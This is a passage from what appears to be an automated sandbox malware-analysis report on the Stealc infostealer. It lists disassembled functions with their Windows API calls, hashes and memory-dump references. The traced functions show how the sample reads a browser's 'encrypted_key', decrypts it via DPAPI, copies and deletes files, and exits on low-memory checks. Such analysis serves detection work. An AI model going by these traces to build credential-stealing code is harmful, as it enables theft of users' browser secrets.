RegCloseKey.ADVAPI32(?), ref: 00F24122
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00F24147
lstrcatA.KERNEL32(?,01781AF8), ref: 00F2415B

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 07c4de4e14bd9650358623b7cd12b29ac531bfb535f8215490bbca914f28af46
Instruction ID: 5d3a37380d4b3a11edfe58ef4ec24f413e710c14b5ec318e14f497c33791f000
Opcode Fuzzy Hash: 07c4de4e14bd9650358623b7cd12b29ac531bfb535f8215490bbca914f28af46
Instruction Fuzzy Hash: 634179B6940208ABDB28EBA0FC56FED773DBB48300F044558B72557185EA795BCC8B91

Function 00F199C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F199EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F19A11
LocalAlloc.KERNEL32(00000040,?), ref: 00F19A31
ReadFile.KERNEL32(000000FF,?,00000000,00F202E7,00000000), ref: 00F19A5A
LocalFree.KERNEL32(00F202E7), ref: 00F19A90
CloseHandle.KERNEL32(000000FF), ref: 00F19A9A

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 2df3554b4660f816fc6264a00d51b5f992da51d0be282464e85e4a41306ec839
Instruction ID: 5016a6fabdd4b2fc57f64b42aa58cde308cf427b73129aa69f7e3643621ec147
Opcode Fuzzy Hash: 2df3554b4660f816fc6264a00d51b5f992da51d0be282464e85e4a41306ec839
Instruction Fuzzy Hash: DA3129B4E40209EFDB24CF94D895BEE7BB5FF48310F108158E911A7290D779AA85DFA0

Function 00F11220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F1123E
__aulldiv.LIBCMT ref: 00F11258
__aulldiv.LIBCMT ref: 00F11266
ExitProcess.KERNEL32 ref: 00F11294

Strings

@, xrefs: 00F11233

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 6dcdf3b15a70bb0cfad69d4a135e8d7f46cc038b08daf056e940772f89a35d3f
Instruction ID: 5c241fdb9502190df320d2b04715cc2b47c2eecbce5eaad1daebe3de363728df
Opcode Fuzzy Hash: 6dcdf3b15a70bb0cfad69d4a135e8d7f46cc038b08daf056e940772f89a35d3f
Instruction Fuzzy Hash: 95014BB0D84358EAEF10DBE0DC4AB9EBBB8BB14701F208158E705B6280D67855859B99

Function 00F19CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F199EC
Part of subcall function 00F199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F19A11
Part of subcall function 00F199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F19A31
Part of subcall function 00F199C0: ReadFile.KERNEL32(000000FF,?,00000000,00F202E7,00000000), ref: 00F19A5A
Part of subcall function 00F199C0: LocalFree.KERNEL32(00F202E7), ref: 00F19A90
Part of subcall function 00F199C0: CloseHandle.KERNEL32(000000FF), ref: 00F19A9A

Part of subcall function 00F28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F19D39

Part of subcall function 00F19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14EEE,00000000,00000000), ref: 00F19AEF
Part of subcall function 00F19AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F14EEE,00000000,?), ref: 00F19B01
Part of subcall function 00F19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14EEE,00000000,00000000), ref: 00F19B2A
Part of subcall function 00F19AC0: LocalFree.KERNEL32(?,?,?,?,00F14EEE,00000000,?), ref: 00F19B3F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00F19D92

Part of subcall function 00F19B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F19B84
Part of subcall function 00F19B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F19BA3
Part of subcall function 00F19B60: memcpy.MSVCRT(?,?,?), ref: 00F19BC6
Part of subcall function 00F19B60: LocalFree.KERNEL32(?), ref: 00F19BD3

Strings

, xrefs: 00F19DC1
DPAPI, xrefs: 00F19D89
"encrypted_key":", xrefs: 00F19D30

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: d44e590c56e576bbcfae6d2b90de269affc07e14b56a98857326646edebb837c
Instruction ID: cafef1cb670309cd0ae595851f069b34dd81a9a7260b40d8695ec4cde3ffd2ad
Opcode Fuzzy Hash: d44e590c56e576bbcfae6d2b90de269affc07e14b56a98857326646edebb837c
Instruction Fuzzy Hash: 56313AB6D10209ABCB14DFE4EC95AEFB7B8BF48304F144518E905A7241EB749A44EBA1

Function 6BF6C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6BF6C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6BF6C969
GetSystemInfo.KERNEL32(?), ref: 6BF6C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6BF6C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6BF6C9E2

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 2e64c56de1cbe0a29482f7afc5a31dd967e9e0b8d2e4f07113febef498996516
Instruction ID: 11b7fcecb274abaa335253d303db695e7f055a847070ac5fb29268119432ad8c
Opcode Fuzzy Hash: 2e64c56de1cbe0a29482f7afc5a31dd967e9e0b8d2e4f07113febef498996516
Instruction Fuzzy Hash: 8F21F9336506146BDF049E75CC84BAE77B9EB86780F50051EFD42A72A0EB74DC0487A1

Function 00F27E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27E37
HeapAlloc.KERNEL32(00000000), ref: 00F27E3E
RegOpenKeyExA.KERNEL32(80000002,0177A198,00000000,00020119,?), ref: 00F27E5E
RegQueryValueExA.KERNEL32(?,017815A8,00000000,00000000,000000FF,000000FF), ref: 00F27E7F
RegCloseKey.ADVAPI32(?), ref: 00F27E92

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: adb492ff040298c063903076b598446b13fb52ae9f981bc6921f8cc39959a9d9
Instruction ID: 928bb7a050452603a11467eae8b9cd7a14af6d8c3542419fba1be2e8480b3090
Opcode Fuzzy Hash: adb492ff040298c063903076b598446b13fb52ae9f981bc6921f8cc39959a9d9
Instruction Fuzzy Hash: 341191B2A84709EFD714DF94E859F7BBBB8FB04711F104229F615A7284D77458009BA1

Function 00F112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00F112B4
HeapAlloc.KERNEL32(00000000), ref: 00F112BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00F112D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 00F112F5
RegCloseKey.ADVAPI32(?), ref: 00F112FF

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: f86fdbe744f70203efbd1a8c7ddc4ac6cc795b5dba1d1f006e195c00523f3719
Instruction ID: 8073c432a277af24e62f2d8d02b22187a2e194e95e04fefb9de8c986f78d053d
Opcode Fuzzy Hash: f86fdbe744f70203efbd1a8c7ddc4ac6cc795b5dba1d1f006e195c00523f3719
Instruction Fuzzy Hash: 2B011DB9A40308FBDB14DFE0E849FAEB7B8EF48701F008269FA1597284D6719A418B50

Function 00F1A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0177DD68,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00F20153), ref: 00F1A0BD
LoadLibraryA.KERNEL32(017816E8,?,?,?,?,?,?,?,?,?,?,?,00F20153), ref: 00F1A146

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A820: lstrlenA.KERNEL32(00000000,?,?,00F25B54,00F30ADB,00F30ADA,?,?,00F26B16,00000000,?,017703D0,?,00F3110C,?,00000000), ref: 00F2A82B
Part of subcall function 00F2A820: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A885

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

SetEnvironmentVariableA.KERNEL32(0177DD68,00000000,00000000,?,00F312D8,?,00F20153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,00F30AFE), ref: 00F1A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps, xrefs: 00F1A0B2, 00F1A0C6, 00F1A0DC

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps
API String ID: 2929475105-8162666
Opcode ID: 36b2ac78231238a535dc9a03a59ae2b7beac86ad76c2d3c2bbf6fbd4fc6fa706
Instruction ID: d95a19b2c4c7a71941fb22254e9bf72984413e889bed75e5d5d4d94ccf6450a0
Opcode Fuzzy Hash: 36b2ac78231238a535dc9a03a59ae2b7beac86ad76c2d3c2bbf6fbd4fc6fa706
Instruction Fuzzy Hash: 29411DB1955304EFCB28EFA5F895AEA37B4BF48301F100238F515A3289DB7959C4DB62

Function 00F1A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F28B60: GetSystemTime.KERNEL32(?,01774AC0,00F305AE,?,?,?,?,?,?,?,?,?,00F14963,?,00000014), ref: 00F28B86

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1A2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 00F1A3FF
lstrlenA.KERNEL32(00000000), ref: 00F1A6BC

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F19E10: memcmp.MSVCRT(?,v20,00000003), ref: 00F19E2D

DeleteFileA.KERNEL32(00000000), ref: 00F1A743

